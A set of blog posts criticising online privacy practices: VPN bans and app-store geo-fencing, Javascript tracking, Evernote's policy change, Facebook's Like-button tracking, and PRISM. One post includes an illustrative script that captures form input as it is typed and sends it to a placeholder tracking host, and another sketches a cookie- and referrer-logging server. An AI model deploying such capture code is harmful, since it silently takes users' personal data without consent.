
Sowing Bitter Seeds

The Internet is outraged by… well, a whole lot of things, as usual, but in particular by Apple. For once, however, the issue is not phones that are both unexciting and unavailable, lacking innovation and wilfully discarding convention, and also both over- and under-priced. No, this time the issue is apps, and in particular VPN apps.

Authoritarian regimes around the world (Russia, "Saudi" Arabia, China, North Korea, etc) have long sought to control their populations' access to information in general, and to the Internet in particular. Of course anyone with a modicum of technical savvy - or a friend, relative, or passing acquaintance willing to do the simple setup - can keep unfettered access to the Internet by going through a Virtual Private Network, or VPN.

A VPN does what it says on the tin: it creates a virtual network that connects directly with an endpoint somewhere else; importantly, somewhere outside the authoritarian regime's control. As such, VPNs have always existed in something of a grey area, but now China (the People's Republic, not that other China) has gone ahead and formally banned their use.

In turn, Apple have responded by removing unregistered VPN apps (which in practical terms means all of them) from their App Store in China. In the face of the Internet's predictable outrage, Apple provided this bald statement (via TechCrunch):

Earlier this year China’s MIIT announced that all developers offering VPNs must obtain a license from the government. We have been required to remove some VPN apps in China that do not meet the new regulations. These apps remain available in all other markets where they do business.

Now, Apple do have a point: the law is indeed the law, and because they operate in China, they have to comply with it, just as they comply with the laws of any other country where they do business.

Here's the rub, though. Because of the regionalised way they have set up their App Store service, they have made themselves unnecessarily vulnerable to this sort of arm-twisting by unfriendly governments. The last time I wrote about geo-fencing and its consequences, the cause of the day was Russia demanding removal of the LinkedIn app, and China (them again!) demanding removal of the New York Times app. As I wrote at the time, companies like Apple originally set up the infrastructure for these geographic restrictions to enable IP protection, but the same tools are being repurposed for censorship:

This sort of restriction used to be "just" hostile to consumers. Now, it is turning into a weapon that authoritarian regimes can wield against Apple, Google, and whoever else. Nobody would allow Russia to ban LinkedIn around the world, or China to remove the New York Times app everywhere - but because dedicated App Stores exist for .ru and .cn, they are able to demand these bans as local exceptions, and even defend them as respecting local laws and sensibilities. If there were one worldwide App Store, this gambit would not work.

The argument against the infrastructure of laws and regulations that was put in place to enable (ineffective) IP restrictions was always that it could be, and would be, repurposed to enable repression by authoritarian regimes. People scoffed at these privacy concerns, saying "if you have nothing to hide, you have nothing to fear". But what if your government is the next to decide that reading the NYT or having a LinkedIn profile is against the law? How scared should you be then?

If you are designing a social network or other system with the expectation of widespread adoption, these days this has to be part of your threat model. Otherwise, one day the government may come knocking, demanding your user database for any reason or no reason at all - and what seemed like a good idea at the time will end up messing up a lot of people's lives.

Product designers by and large do not think of such things, as we saw when Amazon decided that it would be perfectly reasonable to give everyone in your address book access to your Alexa device - and make it so users could not turn off this feature without a telephone call to Amazon support.

How well do you think that would go down if you were a dissident, or just in the social circle of one?

Our instinctive attitude to data is to hoard them, but this instinct is obsolete, forged in a time when data were hard to gather, store, and access. It took something on the scale of the Stasi to build and maintain profiles on even six million citizens (out of a population of sixteen million), and the effort and expense were part of what broke the East German regime in the end. These days, it's trivial to build and access such a profile for pretty much anyone, so we need to change our thinking about data - how we gather them, and how we treat them once we have them.

Personal data are more akin to toxic waste, generated as a byproduct of valuable activity and needing to be stored with extreme care because of the dire consequences of any leaks. Luckily, data are different from toxic waste in one key respect: they can be deleted, or better, never gathered in the first place. The same goes for many other choices, such as restricting users to one particular geographical App Store, or making it easy to share your entire contact list (including by mistake), but very difficult to take that decision back.

What other design decisions are being made today based on obsolete assumptions that will come back to bite users in the future?


UPDATE: And there we go: now Russia is following China’s example and banning VPNs as well. The idea of a technical fix to social and legal problems is always a short-term illusion.


Image by Sean DuBois via Unsplash

The Enemy Within The Browser

At what point do the downsides of Javascript in the browser exceed the upsides? Have we already passed that point?

If you have any concept of security, the idea of downloading code from the Internet and immediately executing it, sight unseen, on your local machine should give you the screaming heebie-jeebies. A lot of work has gone into sandboxing browser processes so that Javascript cannot escape the browser itself and, later, the individual web page it came from. However, that work only addressed the immediate and obvious vulnerability.

These days, the problem with Javascript is that it is used to track users all over the internet and serve them ads for the same products on every site. Quite why this requires 14 MB and 330 HTTP requests for 537 words is not entirely clear.

Actually, no, it is entirely clear: it is because the copro-grammers ("writers of feces") who produce this stuff have no respect for the users. The same utter disrespect underlies the recent bloat in iOS apps:

One Friday I turned off auto-update for apps and let the update queue build up for a week. The results shocked me.
After the first week I had 7.59GB of updates to install, spread across 67 apps – averaging 113MB per app.

Okay, so maybe you say "who cares, you only update apps over wifi" - but do you only browse on wifi? 14 MB for a few hundred words - that adds up fast.

And what else is that Javascript up to, beyond wasting bytes - both over the air, and in local storage?

How about snaffling data entered into a form, regardless of whether it has been submitted?

Using Javascript, those sites were transmitting information from people as soon as they typed or auto-filled it into an online form. That way, the company would have it even if those people immediately changed their minds and closed the page.
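To make the mechanism concrete, here is a minimal sketch of how a page script could capture form fields as they are typed. It is purely illustrative - the collection endpoint and payload are invented, not taken from any of the sites in question - but it shows how little code the technique requires.

```typescript
// Illustrative sketch only: the endpoint and payload shape are hypothetical.
const COLLECT_URL = "https://tracker.example.com/collect";

document.querySelectorAll<HTMLInputElement>("input").forEach((field) => {
  field.addEventListener("input", () => {
    // Fires on every keystroke and on autofill - long before any submit.
    const payload = JSON.stringify({
      page: location.href,
      field: field.name || field.id,
      value: field.value, // whatever has been typed so far
    });
    // sendBeacon survives navigation, so closing the page does not help.
    navigator.sendBeacon(COLLECT_URL, payload);
  });
});
```

Nothing in that sketch requires the form ever to be submitted, which is exactly the behaviour being described.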

My house, my rules. I look forward to iOS 11, and enabling every blocking feature I can.

I really want media sites to earn money so that they can continue to exist, but they cannot do it at my expense. A banner ad is fine, but 14 MB of Javascript to serve me the same banner ad everywhere - at my expense! - is beyond the pale.

Javascript delenda est.

How To Lose Friends and Influence People

I am a huge fan of Evernote. I have used their software for many years, and its many features are key parts of my workflow. I take notes on multiple devices, use tagging to sync between those devices, take snapshots of business cards and let the OCR and the access to LinkedIn sort out the details, annotate images and PDFs, and more.

I should say, I used to be a fan of Evernote. They recently made some changes to their privacy policy that have users up in arms. Here is the relevant entry from their changelog:

Privacy Policy

January 23, 2017 updates to the October 4, 2016 version:

We clarified that in building a more personalized Evernote service that can adapt to the way you think and work, a small group of engineers may need to oversee these automated technologies to ensure they are working as intended. Also, we added that we will be using data from other sources to tailor your Evernote experience and explain how you can get more out of your Evernote account. Please see our FAQ for more information on these changes.

Updates to our legal documents | Evernote

This may sound fairly inoffensive, but it is worrying to me and to many users. These days, "personalisation" is often code for "gathering data indiscriminately for obscure purposes that may change at any time". This exchange is generally presented as a bargain in which users sacrifice (some) privacy to the likes of Google in exchange for free use of their excellent services such as Gmail or Maps.

Evernote's case is different. Because it is a paid app, we users like to assume that we are opting out of that bargain, paying directly for our services instead of paying indirectly by authorising Evernote to resell our personal data to advertisers.

In addition, we use Evernote to store data that may be personal, sensitive, or both. Evernote have always had some weasel words in their Privacy Policy about their employees having access to our notes:

  • We believe our Terms of Service has been violated and confirmation is required or we otherwise have an obligation to review your account Content as described in our Terms of Service;
  • We need to do so for troubleshooting purposes or to maintain and improve the Service;
  • Where necessary to protect the rights, property or personal safety of Evernote and its users (including to protect against potential spam, malware or other security concerns); or
  • In order to comply with our legal obligations, such as responding to warrants, court orders or other legal process. We vigilantly protect the privacy of your account Content and, whenever we determine it possible, we provide you with notice if we believe we are compelled to comply with a third party’s request for information about your account. Please visit our Information for Authorities page for more information.

So basically, Evernote employees have always had access to our stuff. This part of the privacy policy has not changed substantially, but the changes are worrying (emphasis mine):

  • New: Do Evernote Employees Access or Review My Data?
  • Old: Do Evernote Employees Access or Review My Notes?

  • New: Below are the limited circumstances in which we may need to access or review your account information or Content:
  • Old: As a rule, Evernote employees do not monitor or view your personal information or Content stored in the Service, but we list below the limited circumstances in which our employees may need to access or review your personal information or account Content:

  • New: We need to do so for troubleshooting purposes or to maintain and improve the Service;
  • Old: We need to do so for troubleshooting purposes;

Privacy Policy | Evernote
Privacy Policy - 2017 update

Now, here is why people are all up in arms. We would like service providers to tread extremely carefully when it comes to our personal data, accessing it only when warranted. 2016 has provided plenty of object lessons in why we are so sensitive; just today I received an email from Yahoo detailing their latest hack.

Yahoo hack: Should I panic? - BBC News

In this case, Evernote appear to have made two mistakes. First, they designed and built new functionality that requires access to users’ personal data and content in order to do… well, it’s not entirely clear what, beyond the fact that it involves machine learning.

Second, they completely mis-handled the communication of this change. I mean, they even removed the disclaimer that "As a rule, Evernote employees do not monitor or view your personal information or Content stored in the Service"! How tone-deaf can you get?

It’s also very unclear why they even made this change. In their response to the outrage, they say this:

We believe we can make our users even more productive with technologies such as machine learning that will allow you to automate functions you now have to do manually, like creating to-do lists or putting together travel itineraries.

A Note From Chris O’Neill about Evernote’s Privacy Policy

The problem is, users are perfectly capable of managing to-do lists and itineraries, and based on an informal sample of Twitter reactions to this new policy, do not see enough value to want to give unknown Evernote employees access to their data.

An unforced error

This is such a short-sighted decision by Evernote. As one of the few cloud services that are used primarily through fat clients rather than a web browser, Evernote is in a privileged position when it comes to pushing processing out to users’ devices.

Apple have the same advantage, and do the right thing with it: instead of snooping around in my mail and calendar on the server side, my local Mail app can detect dates in messages and offer to create appointments in Calendar. Also, CloudKit’s sync services are encrypted, so nobody at Apple has access to my data - not even if law enforcement asks.

Evernote have chosen not to take that approach, and have not (yet) articulated any benefit that they expect or promise to deliver in exchange for that access. This mis-step has now caused loyal, paying users like me to re-evaluate everything else about the service. At this point, even cancelling the new machine-learning service would not be enough to mollify users; nothing short of a new and explicit commitment to complete encryption of user data - including from Evernote employees! - would suffice.

Evernote's loss will be someone else’s gain

One possible winner from this whole mess is Bear, a new note-taking app that does use CloudKit and is therefore able to provide the encryption at rest that Evernote does not.

Bear - Notes for iPhone, iPad and Mac

The Bear team have even been having some fun on Twitter at Evernote’s expense.

I composed this post in Bear, and I have to say, it is very nice. I copied it over to Evernote to publish here, but it is the first crack in my Evernote habit. Before this mess, I was a vocal advocate of Evernote. Now? I am actively evaluating alternatives.

Respect your users, yo.

One more time

I have worked all my career in enterprise IT, either as a sysadmin, or for vendors of enterprise IT tools. There are many annoyances in big-company IT, but one of the most frustrating is when people miss key aspects of what makes corporate IT tick.

One area is the difference between a brand-new startup whose entire IT estate consists of a handful of bestickered MacBooks, and a decades-old corporation with the legacy IT that history brings. Case in point: Google is stealing away Microsoft’s future corporate customers.

Basically, it turns out that - to absolutely nobody's surprise - startups overwhelmingly use Google's email services. Guess what? Running your own email server for just a few users is not a highly differentiating activity, so it makes sense to hand it off to Google. Big companies on the other hand have a legacy that means it makes sense to stick with what they have and know, which generally means Microsoft Exchange.

So far, so good. The key factor that is missing in this analysis is time. What happens when those startups grow to become mid-size companies or even join the Fortune 50 themselves? Do they stick with Google's relatively simple services, or do they need to transition at some point to an "enterprise" email solution?

It is now clear that Google does deep inspection of email contents. So far, this appears to be done for good: Paedophile snared as Google scans Gmail for images of child abuse. However, if I were in a business that competes with Google - and these days, that could be anything - I would feel distinctly uncomfortable about that.

There are also problems of corporate policy and compliance that apply to proper grown-up companies. At the simplest level, people often have their own personal Gmail accounts as well, and with Google's decision to use that login for all their services, there is enormous potential for bleed-over between the two domains. At a more complex level, certain types of data may be required to be stored in such a way that no third parties (such as Google) have access to them. Gmail would not work for that requirement either.

Simply put, startups have different needs from big established corporations. For a small startup, the cost of full-time IT staff is a huge burden. The alternative of doing your own support doesn't work either, because every hour spent setting up, maintaining, or troubleshooting IT infrastructure is an hour not spent working on your actual product. For a big corporation with thousands of employees, on the other hand, it makes a lot of sense to dedicate a few of them to in-house IT support, especially if the alternatives include major fines or even seeing managers go to jail. The trend Quartz identified is interesting, but it's a snapshot of a point in time. What would be more interesting would be to see how the trend develops as those companies grow and change from one category to another.

A corollary to this is that business IT is not consumer IT. Trying to mix the two is a recipe for disaster. Big B2B vendors end up looking very silly when they try to copy Apple, and journalists look just as silly when they fail to understand the key differences between B2B and consumer IT, and between small-company IT and big-company IT.


Image by Philipp Henzler via Unsplash

Privacy? On the Internet?

Periodically something happens that gets everyone very worked up about privacy online. Of course anyone who has ever administered a mail server has to leave the room when that conversation starts, because our mocking laughter apparently upsets people.1

The latest outrage is that Facebook has apparently been messing with people's feeds. No, I don't mean the stuff about filtering out updates from pages that aren't paying for placement.

No, I don't mean the auto-playing videos either. Yes, they annoy me too.

No, it seems that Facebook manipulated the posts that showed up in certain users' feeds, sending them more negative information to see whether this would affect their mood - as revealed, naturally, through their Facebook postings.

Now, it has long been a truism that online, and especially when it comes to Facebook, privacy is dead. The simplistic response is of course "if you wanted it to be a secret, then why did you share it on Facebook?". That is a valid point as far as it goes. The problem is that the early assumptions about Facebook no longer hold true.

Time was, Facebook knew what you did on Facebook, but once you left the site, you were free to get up to things you might not want to share with everybody. Then those "Like" buttons started proliferating everywhere. Brands and website operators wanted to garner "likes" from users to prove their popularity, or at least the effectiveness of their latest marketing gimmick ("like our site for the chance to win an iPad!").

It turns out that on top of tracking what you actually "like", Facebook can track any page you look at that has a Like button embedded. Given that the things are absolutely everywhere, that gives them probably the most complete picture of any ad network out there.
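The mechanism is worth spelling out, because it applies to any third-party embed, not just Facebook's. When a page includes a Like button, every visitor's browser fetches it from Facebook's servers, and that request carries both the referring page and any Facebook cookies. The hypothetical logging handler below (names, cookie, and endpoint invented for illustration) is roughly all the receiving end needs:

```typescript
// Hypothetical sketch of what any third-party embed provider can log.
// Every page embedding the widget triggers a request like this per visitor.
import { createServer } from "http";

createServer((req, res) => {
  const visitorId = /uid=([^;]+)/.exec(req.headers.cookie ?? "")?.[1]; // third-party cookie
  const pageVisited = req.headers.referer; // the page that embedded the button
  console.log(`visitor ${visitorId ?? "unknown"} is reading ${pageVisited}`);

  // Serve the innocuous-looking widget; the tracking has already happened.
  res.setHeader("Content-Type", "image/svg+xml");
  res.end("<svg xmlns='http://www.w3.org/2000/svg'/>");
}).listen(8080);
```

No click on the button is required; merely loading a page that embeds it is enough to register the visit against the visitor's profile.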

Then Facebook changed their news delivery options. It used to be that "liking" a page meant that you would see all their updates. Now, it means that about 2% of the people who "like" the page see the updates - unless the page operators choose to pay to amplify their reach... Note that these pages do not necessarily belong to brands and advertisers. If your old school has a page that you "like", in the expectation that you will now receive their updates, you're out of luck. Guess you'd better arrange a fundraiser at your next reunion to gather cash to pay Facebook. On the plus side, you have a built-in excuse for poor attendance at the reunion: "ah, I guess they were in the 98% that Facebook didn't deliver the notifications to".

And now Facebook have gone whole-hog, not just preventing information from reaching users' feeds, but actively changing the contents of the users' feeds - in the name of Science, sure.

This is far beyond what people think they have signed up for. There is a big difference between being tracked on Facebook, and being tracked by Facebook, everywhere you go. The difference is not just moral, but commercial. After all, tracking users across multiple websites has been standard operating procedure for ad networks for a long time now. If you've ever shopped online for something and then seen nothing but ads for that one thing for a month thereafter, you have experienced this first-hand. It's mildly creepy, but at this point everyone is pretty well inured to this level of tracking.

Being tracked by ad networks is different from being tracked by Facebook in one very important way. So far, nobody seems to have figured out a good way to make money with content on the internet. A few people do okay with subscriptions, but it tends to be a niche thing. Otherwise, pretty much everything is ad-funded in some way. Now, banner ads can be annoying, and the tracking can get creepy, but at least the money from the ad impressions is going to the site operator, who provides the content that keeps us all coming back.

The "like" button subverts this mechanism, because it's just as creepy and Big-Brotherish, but none of the money goes to the site's operator. All the money and data go only to Facebook, who are even now trying to figure out how to modify your feed to make you want to buy things. Making you feel bad was only step 1, but not everyone goes straight to retail therapy as a remedy. Step 2 is hacking our exocortices (hosted on Facebook) to manipulate the "buy now!" instinct directly.

If you enjoyed this article, please like it on Facebook.


  1. If you don't know what I'm talking about, let's just say I really, really know what I'm talking about when I say you shouldn't send credit card numbers in the clear, and leave it at that. 

Why can't Big Brother ever lift a finger to help out?

It strikes me that the NSA and their counterparts missed a trick.

Maybe it's because I'm in the throes of moving house, with all the associated change-of-address shenanigans, but it occurs to me that it would be very useful if the government actually operated a single information repository. I mean, that's what they already do, right?

So, why not do it in a way that serves the public? The government sets up an IDDB which has all of everyone's information in it; so far, so icky. But here's the thing: set it up so that individuals can grant access to specific data in that DB - such as their address. Instead of telling various credit card companies, utilities, magazine companies, Amazon, and everyone else my new address, I just update it in the IDDB, and bam, those companies' tokens automatically pick up the new value too - assuming I don't revoke their access in the meantime.

This could also be useful for all sorts of other things, like marital status, insurance, healthcare, and so on. Segregated, granular access to the information is the name of the game: instead of letting government agencies and private companies read all the data, each of them gets access only to the data it needs to do its job.
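To make the idea slightly more concrete, here is a rough sketch of what such a grant model might look like. The field names and API are invented for illustration; the point is simply that updates happen in one place, and that access is both field-level and revocable.

```typescript
// Sketch of a field-level, revocable grant model for a hypothetical IDDB.
type FieldName = "address" | "maritalStatus" | "insuranceProvider";

interface Grant {
  citizenId: string;
  grantee: string;     // e.g. "acme-utilities"
  fields: FieldName[]; // only these fields are visible to the grantee
  revoked: boolean;
}

class IdDb {
  private records = new Map<string, Record<FieldName, string>>();
  private grants: Grant[] = [];

  update(citizenId: string, field: FieldName, value: string) {
    const record = this.records.get(citizenId) ?? ({} as Record<FieldName, string>);
    record[field] = value; // one update, visible to every current grantee
    this.records.set(citizenId, record);
  }

  grant(citizenId: string, grantee: string, fields: FieldName[]) {
    this.grants.push({ citizenId, grantee, fields, revoked: false });
  }

  revoke(citizenId: string, grantee: string) {
    this.grants
      .filter((g) => g.citizenId === citizenId && g.grantee === grantee)
      .forEach((g) => (g.revoked = true));
  }

  read(citizenId: string, grantee: string, field: FieldName): string | undefined {
    const allowed = this.grants.some(
      (g) => g.citizenId === citizenId && g.grantee === grantee && !g.revoked && g.fields.includes(field)
    );
    return allowed ? this.records.get(citizenId)?.[field] : undefined;
  }
}
```

Moving house then becomes a single update of the address field, and every company holding an unrevoked grant sees the new value the next time it reads - exactly the convenience described above.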

People have a problem with any Tom, Dick, or Harry being able to read all their information, but the objection isn't intrinsically to the gathering of the information; it's to the unrestricted access - the idea that any busybody can log in and browse whatever they care to look at.

Offering an IDDB service would go a long way to solving the PR problem of programmes like PRISM and its ilk. Of course there are enormous issues with abuse of such a system, but since it seems governments cannot be prevented from building (and abusing) these systems anyway, couldn't we at least get some convenience out of it?

Clouded Prism

One of the questions raised as part of the PRISM discussion has been the impact on the internet industry, and specifically on cloud computing. For instance, Julie Craig of EMA wrote a post titled “PRISM: The End of the Cloud?”

I think these fears are a bit overblown. While there will probably be some blowback, most of the people who care about this sort of thing were already worried enough about the Patriot Act without needing to know more about PRISM. I think the number of people who will start to care about privacy and data protection as a result of PRISM will be fairly small. All Things D's Joy of Tech cartoon nailed it, as usual.

The same kind of thing applies in business. Many companies don't really care very much either way about the government reading their files. They might get more exercised about their competitors having access, but apart from perhaps some financial information, the government is low down the list of potential threats.

Of course, most analysis focuses on the question of US citizens and corporations using US services. What happens in the case of foreign users, whether private or corporate, using US services? There has been some overheated rhetoric on this point as well, but I don't think it's a huge factor. Much like Americans, people in the rest of the world already knew about the Patriot Act, and most of them voted with their feet by continuing to use US services, showing that they did not care. As for corporations, most countries have their own restrictions on what data can be stored, processed, or accessed across borders, quite possibly to make it easier to run their own versions of PRISM, so companies are already pretty constrained in terms of what they could even put into these US services.

For companies already using the public cloud or looking into doing so, this is a timely reminder that not all resources are created equal, and that there are factors beyond the purely technical and financial ones that need to be considered. The PRISM story might provide a boost for service providers outside the US, who can carve out a niche for themselves as giving the advantages of public cloud, but in a local or known jurisdiction. This could mean within a specific country, within a wider region such as the EU, or completely offshore. Sealand may have been ahead of its time, but soon enough there must emerge a "Switzerland of the cloud". The argument that only unsavoury types would use such a service doesn't really hold water, given that criminals already have the Russian Business Network and its ilk.

Bottom line, PRISM is nothing new, and it doesn't really bring any new facts. Given the Patriot Act, the sensible assumption had to be that the US government was doing something like this - and so were other technologically sophisticated governments around the world. The only impact it might have is in perception, if it blows up into a big enough story and stays around for long enough. In terms of actual rational grounds for decision-making, my personal expectation is for impact to be extremely limited.